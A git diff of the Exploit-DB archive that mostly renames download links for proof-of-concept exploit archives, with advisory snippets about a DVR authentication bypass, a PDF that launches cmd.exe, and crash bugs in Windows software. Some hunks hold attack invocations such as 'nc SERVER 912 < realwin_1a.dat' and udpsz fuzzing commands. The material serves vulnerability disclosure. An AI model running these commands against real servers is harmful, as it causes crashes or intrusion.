-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ypk2008.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5282.tar.gz (2008-ypk2008.tar.gz) # milw0rm.com [2008-03-20] diff --git a/platforms/webapps/10209.txt b/platforms/webapps/10209.txt deleted file mode 100755 index dfd6de3a9..000000000 --- a/platforms/webapps/10209.txt +++ /dev/null @@ -1,26 +0,0 @@ -************************************************************** -Product: Everfocus EDSR series -Version affected: 1.4 and older -Website: http://www.everfocus.com/ -Discovered By: Andrea Fabrizi -Email: andrea.fabrizi () gmail com -Web: http://www.andreafabrizi.it -Vuln: remote DVR applet authentication bypass -************************************************************** - -The EDSR firmware don't handle correctly users authentication and sessions. - -This exploit let you to connect to every remote DVR (without username -and password) and see the live cams :) -Exploit: http://www.andreafabrizi.it/files/EverFocus_Edsr_Exploit.tar.gz - -I discovered this vulnerability one year ago and i have informed the -vendor, but apparently -there is no solution at this time. - --- -Andrea Fabrizi -http://www.andreafabrizi.it - - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-EverFocus_Edsr_Exploit.tar.gz \ No newline at end of file diff --git a/platforms/win32/remote/11615.txt b/platforms/win32/remote/11615.txt index 9b4132ba5..d5b24f9aa 100755 --- a/platforms/win32/remote/11615.txt +++ b/platforms/win32/remote/11615.txt @@ -11,7 +11,7 @@ Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP plat =============================================================== A copy of test.hlp can be downloaded from here: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/msgbox_test_help.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11615.zip (msgbox_test_help.zip) =============================================================== diff --git a/platforms/win32/shellcode/13507.txt b/platforms/win32/shellcode/13507.txt index f1b2cd0d9..810df0fdc 100755 --- a/platforms/win32/shellcode/13507.txt +++ b/platforms/win32/shellcode/13507.txt @@ -13,7 +13,8 @@ More details can be found here: http://skypher.com/wiki/index.php?title=Shellcode/w32_SEH_omelet_shellcode http://code.google.com/p/w32-seh-omelet-shellcode/ -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-w32-SEH-omlet-shellcode-v0.1.zip +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13507-1.zip (2009-w32-SEH-omlet-shellcode-v0.2.zip) +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13507-2.zip (2009-w32-SEH-omlet-shellcode-older-versions.zip) I have not had a chance to test this newer version in a live exploit, so do let me know if you have a chance to use it. diff --git a/platforms/windows/dos/10204.txt b/platforms/windows/dos/10204.txt index 43a46d6f1..949d1762d 100755 --- a/platforms/windows/dos/10204.txt +++ b/platforms/windows/dos/10204.txt @@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions. -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36668.tar +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10204.tar (2009-11-22-36668.tar) diff --git a/platforms/windows/dos/10208.txt b/platforms/windows/dos/10208.txt index b223ec09a..b5e25d96e 100755 --- a/platforms/windows/dos/10208.txt +++ b/platforms/windows/dos/10208.txt @@ -2,4 +2,4 @@ Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x thro attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-memcorrupt.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10208.tgz (2009-11-22-memcorrupt.tgz) \ No newline at end of file diff --git a/platforms/windows/dos/10343.txt b/platforms/windows/dos/10343.txt index 2c09ffe53..90822b3cc 100755 --- a/platforms/windows/dos/10343.txt +++ b/platforms/windows/dos/10343.txt @@ -101,10 +101,10 @@ Some malicious user can use is to create a DoS condition on a server or workstat The PoC Files can be download here. Hang CPU -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL_CPU_Hang.arj +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10343-1.arj (PRL_CPU_Hang.arj) Crash Application -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL_Crash.cab +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10343-2.cab (PRL_Crash.cab) ##################################################################################### diff --git a/platforms/windows/dos/11062.txt b/platforms/windows/dos/11062.txt index 1296719e5..26a8dd95a 100755 --- a/platforms/windows/dos/11062.txt +++ b/platforms/windows/dos/11062.txt @@ -5,5 +5,5 @@ # Code : -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/sopcast_exp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11062.zip (sopcast_exp.zip) diff --git a/platforms/windows/dos/11064.txt b/platforms/windows/dos/11064.txt index 8563bd6f1..9463577ed 100755 --- a/platforms/windows/dos/11064.txt +++ b/platforms/windows/dos/11064.txt @@ -4,4 +4,4 @@ # Tested on: xpsp3 ie6 # Code : -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/uusee.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11064.zip (uusee.zip) \ No newline at end of file diff --git a/platforms/windows/dos/11176.txt b/platforms/windows/dos/11176.txt index 6f312ec10..e6e4f977b 100755 --- a/platforms/windows/dos/11176.txt +++ b/platforms/windows/dos/11176.txt @@ -5,4 +5,4 @@ # I exposed this vunl two weeks ago,are you really responsible for # the security of millions users? # Code : -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11176.zip (Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip) \ No newline at end of file diff --git a/platforms/windows/dos/11182.txt b/platforms/windows/dos/11182.txt index 8af9c46db..83d7c7f6d 100755 --- a/platforms/windows/dos/11182.txt +++ b/platforms/windows/dos/11182.txt @@ -1,7 +1,7 @@ # Version: 6/7/8 # Tested on: Windows XP SP3 English & Windows 7 # CVE : -# Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ie_crash.tar.gz +# Code: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11182.tar.gz (ie_crash.tar.gz) Description: Modified 1360. byte to 44, 1361. to 43, 1362. 42, 1363. byte to 41 of a sample swf file, ran it and crash occurred. diff --git a/platforms/windows/dos/11192.txt b/platforms/windows/dos/11192.txt index b6534f471..a88825555 100755 --- a/platforms/windows/dos/11192.txt +++ b/platforms/windows/dos/11192.txt @@ -20,7 +20,7 @@ Opening a malformed ".slk" file with Openoffice, causes a crash on PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/slk.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11192.rar (slk.rar) Credits: karak0rsan and murderkey from Hellcode Research diff --git a/platforms/windows/dos/11245.txt b/platforms/windows/dos/11245.txt index 25ca64d6d..c819b8460 100755 --- a/platforms/windows/dos/11245.txt +++ b/platforms/windows/dos/11245.txt @@ -10,4 +10,4 @@ This same bug was in early version of firfox,found by (Wojciech Pawlikowski) Thi This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Firefox-v3.6_PoC.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11245.rar (Firefox-v3.6_PoC.rar) diff --git a/platforms/windows/dos/11247.txt b/platforms/windows/dos/11247.txt index 7992080e7..5f3761d9b 100755 --- a/platforms/windows/dos/11247.txt +++ b/platforms/windows/dos/11247.txt @@ -9,4 +9,4 @@ after opening the opera.html broswer hang for a while and crush.same bug in fire This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Opera_10.10-PoC.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11247.rar (Opera_10.10-PoC.rar) \ No newline at end of file diff --git a/platforms/windows/dos/11342.txt b/platforms/windows/dos/11342.txt index bb42e76b4..8a1ca14c7 100755 --- a/platforms/windows/dos/11342.txt +++ b/platforms/windows/dos/11342.txt @@ -3,4 +3,4 @@ # Tested on: Windows XP SP2/SP3 (x86), Vista (x86), Windows 7 (x64) # Code : A specially crafted SQL file query can cause the the application to freeze and finally crash. The bug is the SQL query processor engine, it can't handle malformed SQL queries leading to crash. -# PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/sqlite_browser_db_poc.tar.gz \ No newline at end of file +# PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11342.tar.gz (sqlite_browser_db_poc.tar.gz) \ No newline at end of file diff --git a/platforms/windows/dos/11632.txt b/platforms/windows/dos/11632.txt index 2aecc590f..cdac8e315 100755 --- a/platforms/windows/dos/11632.txt +++ b/platforms/windows/dos/11632.txt @@ -1,7 +1,7 @@ When Orb is first installed it registers several Direct Show filters with the system. When registered these filters are then called whenever a file which has a dependency on such a required filter is accessed. By specially crafting specific headers embedded into an mp3 file we can create a direct code path to code which is vulnerable to a integer division by zero. This vulnerability can be triggered remotely be embedding the crafted mp3 file into HTML. It is also not dependent on a certain media player. Attached is a PoC (Proof-Of-Concept) I wrote for this specific bug. Also included is a Rebuild file for IDA Pro examining the crash. Download POC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/aac_parser_int_div_by_0_orb.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11632.zip (aac_parser_int_div_by_0_orb.zip) Timeline: diff --git a/platforms/windows/dos/11803.txt b/platforms/windows/dos/11803.txt index 20ce55cb3..dab9ba87c 100755 --- a/platforms/windows/dos/11803.txt +++ b/platforms/windows/dos/11803.txt @@ -5,7 +5,7 @@ Successful exploitation of this vulnerability allows an attacker to execute arbi This vulnerability is confirmed in Crimson Editor version 3.70. A PoC configuration file can be downloaded here: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cedt.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11803.zip (cedt.zip) Ref: diff --git a/platforms/windows/dos/11987.txt b/platforms/windows/dos/11987.txt index 333f3a606..037f7df24 100755 --- a/platforms/windows/dos/11987.txt +++ b/platforms/windows/dos/11987.txt @@ -24,7 +24,7 @@ With Foxit Reader, no warning is displayed: I’m not publishing my PoC PDF yet, but you can download a PDF that will just launch cmd.exe here. Use it to test your PDF reader: - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/launch-action-cmd.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11987.zip (launch-action-cmd.zip) With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs). diff --git a/platforms/windows/dos/13872.txt b/platforms/windows/dos/13872.txt index e94fccad0..9e7f6a45b 100755 --- a/platforms/windows/dos/13872.txt +++ b/platforms/windows/dos/13872.txt @@ -7,4 +7,4 @@ Code was generated utilizing a custom fuzzer, PoC creates an Access Violation when writing to memory. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/SumatraPDF1.1DOS.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13872.pdf (SumatraPDF1.1DOS.pdf) \ No newline at end of file diff --git a/platforms/windows/dos/13959.c b/platforms/windows/dos/13959.c index 0c38b9e47..f0a689e8a 100755 --- a/platforms/windows/dos/13959.c +++ b/platforms/windows/dos/13959.c @@ -225,7 +225,7 @@ cause a crash of the server: http://aluigi.org/poc/teamspeakrack.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/teamspeakrack.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13959.zip (teamspeakrack.zip) ####################################################################### diff --git a/platforms/windows/dos/14286.txt b/platforms/windows/dos/14286.txt index 42ab9f7d7..870eab92a 100755 --- a/platforms/windows/dos/14286.txt +++ b/platforms/windows/dos/14286.txt @@ -84,7 +84,7 @@ invalid memory accesses. http://aluigi.org/testz/udpsz.zip or -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/grawpoc.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14286.zip (grawpoc.zip) A] udpsz -C "0100 13 0003 0000 ffffffff" -b 0x41 SERVER 16250 3000 diff --git a/platforms/windows/dos/14346.txt b/platforms/windows/dos/14346.txt index 0443b34d3..6b9b2df3f 100755 --- a/platforms/windows/dos/14346.txt +++ b/platforms/windows/dos/14346.txt @@ -33,4 +33,4 @@ - PoC: http://www.zeroscience.mk/codes/zsl_poc17.shw.rar or -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/zsl_poc17.shw.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14346.rar (zsl_poc17.shw.rar) diff --git a/platforms/windows/dos/14414.txt b/platforms/windows/dos/14414.txt index cac4c2f67..d0ddd0290 100755 --- a/platforms/windows/dos/14414.txt +++ b/platforms/windows/dos/14414.txt @@ -64,7 +64,7 @@ are no limitations. http://aluigi.org/fakep/unrealfp.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/unrealfp.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14414.zip (unrealfp.zip) unrealfp -x 2 -c "STEAMBLOB B=" SERVER PORT diff --git a/platforms/windows/dos/14424.txt b/platforms/windows/dos/14424.txt index a98864a80..b9f719bf2 100755 --- a/platforms/windows/dos/14424.txt +++ b/platforms/windows/dos/14424.txt @@ -74,7 +74,7 @@ No other technical details are available at the moment. http://aluigi.org/poc/fearless.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/fearless.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14424.zip (fearless.zip) tuned to work with the F.E.A.R. series, so Project Origin included. diff --git a/platforms/windows/dos/14642.txt b/platforms/windows/dos/14642.txt index b4358cdbd..49c0f7ddd 100755 --- a/platforms/windows/dos/14642.txt +++ b/platforms/windows/dos/14642.txt @@ -8,4 +8,4 @@ After reading the paper, I started studying the TTF format. After initial resear Writeup and proof of concept files included in archive file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/VA010-003.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14642.tgz (VA010-003.tgz) \ No newline at end of file diff --git a/platforms/windows/dos/14882.txt b/platforms/windows/dos/14882.txt index fc1dfa734..e66270692 100755 --- a/platforms/windows/dos/14882.txt +++ b/platforms/windows/dos/14882.txt @@ -120,5 +120,5 @@ Stack Reproduction Use attached PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/FFDshowSEHExceptionleadingtoNULLpointeronRead.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14882.rar (FFDshowSEHExceptionleadingtoNULLpointeronRead.rar) diff --git a/platforms/windows/dos/14883.txt b/platforms/windows/dos/14883.txt index 69130e406..160433201 100755 --- a/platforms/windows/dos/14883.txt +++ b/platforms/windows/dos/14883.txt @@ -100,5 +100,5 @@ char data[18448] char data[7807] = -120 PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/IntelVideoCodecs5RemoteDenialofService.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14883.rar (IntelVideoCodecs5RemoteDenialofService.rar) \ No newline at end of file diff --git a/platforms/windows/dos/14949.py b/platforms/windows/dos/14949.py index 9cf11ff66..0c6eb6a38 100755 --- a/platforms/windows/dos/14949.py +++ b/platforms/windows/dos/14949.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-day9-ba.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14949.zip (moaub-day9-ba.zip) ''' diff --git a/platforms/windows/dos/14971.py b/platforms/windows/dos/14971.py index cfe712831..3d0e77c1f 100755 --- a/platforms/windows/dos/14971.py +++ b/platforms/windows/dos/14971.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-11-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14971.zip (moaub-11-exploit.zip) ''' ''' diff --git a/platforms/windows/dos/14974.txt b/platforms/windows/dos/14974.txt index 76f17762d..62e57c3bf 100755 --- a/platforms/windows/dos/14974.txt +++ b/platforms/windows/dos/14974.txt @@ -28,4 +28,4 @@ http://elotrolad0.blogspot.com/2010/09/hp-data-protector-media-operations-611.ht by r0i -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HP_Data_Protector_Poc.rar \ No newline at end of file +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14974.rar (HP_Data_Protector_Poc.rar) \ No newline at end of file diff --git a/platforms/windows/dos/14992.py b/platforms/windows/dos/14992.py index 6db248b22..7c03c7050 100755 --- a/platforms/windows/dos/14992.py +++ b/platforms/windows/dos/14992.py @@ -22,7 +22,7 @@ CVE : CVE-2010-3000 # POC for CVE-2010-3000 # http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/ -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-13-exploit.zip +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14992.zip (moaub-13-exploit.zip) import sys diff --git a/platforms/windows/dos/15019.txt b/platforms/windows/dos/15019.txt index a30b187ad..232917818 100755 --- a/platforms/windows/dos/15019.txt +++ b/platforms/windows/dos/15019.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1248 here is BA : http://www.exploit-db.com/maoub-16-microsoft-excel-hfpicture-record-parsing-remote-code-execution-vulnerability/ -here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HFPicture_PoC.rar \ No newline at end of file +here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15019.rar (HFPicture_PoC.rar) \ No newline at end of file diff --git a/platforms/windows/dos/15027.py b/platforms/windows/dos/15027.py index 8c05d4f75..165c3f68a 100755 --- a/platforms/windows/dos/15027.py +++ b/platforms/windows/dos/15027.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-17-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15027.zip (moaub-17-exploit.zip) ''' ''' Title : Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution diff --git a/platforms/windows/dos/15065.txt b/platforms/windows/dos/15065.txt index a0751705c..0c9d5f912 100755 --- a/platforms/windows/dos/15065.txt +++ b/platforms/windows/dos/15065.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1248 here is BA : http://www.exploit-db.com/moaub-21-microsoft-excel-wopt-record-parsing-heap-memory-corruption/ -here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-12-exploit.rar +here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15065.rar (moaub-21-exploit.rar) diff --git a/platforms/windows/dos/15076.py b/platforms/windows/dos/15076.py index ae3415f78..38598ee41 100755 --- a/platforms/windows/dos/15076.py +++ b/platforms/windows/dos/15076.py @@ -19,7 +19,7 @@ Twitter : @abysssec http://www.exploit-db.com/moaub-22-adobe-shockwave-director-tsac-chunk-memory-corruption/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-22-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15076.zip (moaub-22-exploit.zip) ''' diff --git a/platforms/windows/dos/15088.txt b/platforms/windows/dos/15088.txt index 6224a97b8..26b8b8bbe 100755 --- a/platforms/windows/dos/15088.txt +++ b/platforms/windows/dos/15088.txt @@ -18,4 +18,4 @@ CVE : NO CVE here is BA : http://www.exploit-db.com/moaub-23-microsoft-office-excel-2002-memory-corruption-vulnerability-0day/ -here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-excel-poc.zip \ No newline at end of file +here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15088.zip (moaub-23-excel-poc.zip) \ No newline at end of file diff --git a/platforms/windows/dos/15096.py b/platforms/windows/dos/15096.py index 349924249..6fc3f9950 100755 --- a/platforms/windows/dos/15096.py +++ b/platforms/windows/dos/15096.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-24-microsoft-mpeg-layer-3-audio-decoder-division-by-zero/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-24-mp3-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15096.zip (moaub-24-mp3-exploit.zip) ''' ''' diff --git a/platforms/windows/dos/15104.py b/platforms/windows/dos/15104.py index 07f23bff9..8324d9710 100755 --- a/platforms/windows/dos/15104.py +++ b/platforms/windows/dos/15104.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/ - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-25-exploit.zip + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15104.zip (moaub-25-exploit.zip) ''' diff --git a/platforms/windows/dos/15148.txt b/platforms/windows/dos/15148.txt index b4f9d819c..55755aaa0 100755 --- a/platforms/windows/dos/15148.txt +++ b/platforms/windows/dos/15148.txt @@ -18,5 +18,4 @@ CVE : CVE-2010-1245 here is BA : http://www.exploit-db.com/moaub-29-microsoft-excel-sxview-record-parsing-memory-corruption/ -here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-29-exploit.rar -t \ No newline at end of file +here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15148.rar (moaub-29-exploit.rar) diff --git a/platforms/windows/dos/15158.py b/platforms/windows/dos/15158.py index cbb99b698..b8d894ad8 100755 --- a/platforms/windows/dos/15158.py +++ b/platforms/windows/dos/15158.py @@ -21,7 +21,7 @@ MOAUB Number : MOAUB-FINAL http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-30-PoC.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15158.zip (moaub-30-PoC.zip) ''' import sys diff --git a/platforms/windows/dos/15248.txt b/platforms/windows/dos/15248.txt index 8c83b66bb..e5fb0fb0c 100755 --- a/platforms/windows/dos/15248.txt +++ b/platforms/windows/dos/15248.txt @@ -102,7 +102,7 @@ of the track. http://aluigi.org/poc/winamp_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/winamp_1_13Oct10.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15248.zip (winamp_1_13Oct10.zip) ####################################################################### diff --git a/platforms/windows/dos/15259.txt b/platforms/windows/dos/15259.txt index 6b1a85022..f801cf04f 100755 --- a/platforms/windows/dos/15259.txt +++ b/platforms/windows/dos/15259.txt @@ -75,7 +75,7 @@ caused by the usage of strcpy() with the data supplied by the attacker. http://aluigi.org/poc/realwin_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/realwin_1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15259.zip (realwin_1.zip) nc SERVER 912 < realwin_1a.dat nc SERVER 912 < realwin_1b.dat diff --git a/platforms/windows/dos/15260.txt b/platforms/windows/dos/15260.txt index b51417b99..c8553ba7e 100755 --- a/platforms/windows/dos/15260.txt +++ b/platforms/windows/dos/15260.txt @@ -60,7 +60,7 @@ didn't result exploitable. http://aluigi.org/poc/unirpcd_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/unirpcd_1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15260.zip (unirpcd_1.zip) ####################################################################### diff --git a/platforms/windows/dos/15407.txt b/platforms/windows/dos/15407.txt index 7ba7e02da..5e446fe4e 100755 --- a/platforms/windows/dos/15407.txt +++ b/platforms/windows/dos/15407.txt @@ -121,4 +121,4 @@ Followup: MachineOwner 3.Proof of concept is in poc.zip file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/poc.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15407.zip (poc.zip) diff --git a/platforms/windows/dos/15419.txt b/platforms/windows/dos/15419.txt index cd8853b83..2a1d37bd4 100755 --- a/platforms/windows/dos/15419.txt +++ b/platforms/windows/dos/15419.txt @@ -1,3 +1,3 @@ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/xpl_pdf.bin +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15419.bin (xpl_pdf.bin) http://extraexploit.blogspot.com/2010/11/full-disclosure-xplpdf-adober-reader-94.html \ No newline at end of file diff --git a/platforms/windows/dos/15426.txt b/platforms/windows/dos/15426.txt index affaf7250..1e5b405bf 100755 --- a/platforms/windows/dos/15426.txt +++ b/platforms/windows/dos/15426.txt @@ -58,5 +58,5 @@ short BranchOffset, value -305 BranchOffset is located @ E6h-E7h -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adobe_flash_int_ovrflw_poc.rar +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar) diff --git a/platforms/windows/dos/15444.zip b/platforms/windows/dos/15444.zip index 54ae47174..0cf03136c 100755 --- a/platforms/windows/dos/15444.zip +++ b/platforms/windows/dos/15444.zip @@ -122,4 +122,4 @@ Followup: MachineOwner 3.PoC is in NtOpenKey_poc.zip file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/NtOpenKey_poc.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15444.zip (NtOpenKey_poc.zip) \ No newline at end of file diff --git a/platforms/windows/dos/15514.txt b/platforms/windows/dos/15514.txt index e8037d0a5..8e3fe15c3 100755 --- a/platforms/windows/dos/15514.txt +++ b/platforms/windows/dos/15514.txt @@ -2,4 +2,4 @@ Foxit Reader 4.1.1 is subject to a stack overflow vulnerability when parsing ove The included PoC results in a SEH overwrite. The exception must be passed twice in order to reach the overwritten handler. This vulnerability was reported to the vendor and was patched in Foxit Reader 4.2. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/foxit_411_poc.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15514.pdf (foxit_411_poc.pdf) \ No newline at end of file diff --git a/platforms/windows/dos/15581.txt b/platforms/windows/dos/15581.txt index 598dd45bb..21bb76a8d 100755 --- a/platforms/windows/dos/15581.txt +++ b/platforms/windows/dos/15581.txt @@ -61,4 +61,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4978.php PoC: http://www.zeroscience.mk/codes/pocs_ens_ism.rar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/pocs_ens_ism.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15581.rar (pocs_ens_ism.rar) \ No newline at end of file diff --git a/platforms/windows/dos/15992.txt b/platforms/windows/dos/15992.txt index 63bbb0932..061f8b821 100755 --- a/platforms/windows/dos/15992.txt +++ b/platforms/windows/dos/15992.txt @@ -89,7 +89,7 @@ copying the input data in a temporary buffer of about 60 bytes: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/udpsz.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15992.zip (udpsz.zip) udpsz -T -b a -C 020101 SERVER 46823 1000 diff --git a/platforms/windows/dos/1615.txt b/platforms/windows/dos/1615.txt index 193f3495c..730275cf0 100755 --- a/platforms/windows/dos/1615.txt +++ b/platforms/windows/dos/1615.txt @@ -1,4 +1,4 @@ -# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/excel_03262006.rar +# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar (excel_03262006.rar) Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0 Date : 02/12/2006 diff --git a/platforms/windows/dos/16254.txt b/platforms/windows/dos/16254.txt index 01f45609a..c4218edf6 100755 --- a/platforms/windows/dos/16254.txt +++ 